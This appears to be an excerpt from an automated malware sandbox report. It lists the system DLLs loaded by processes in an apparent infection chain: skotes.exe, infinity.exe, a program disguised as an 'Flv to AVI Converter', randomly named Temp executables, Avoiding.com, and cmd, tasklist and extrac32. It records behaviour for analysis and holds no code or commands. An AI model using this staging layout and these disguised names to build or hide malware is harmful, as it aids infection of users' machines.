                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: rstrtmgr.dll
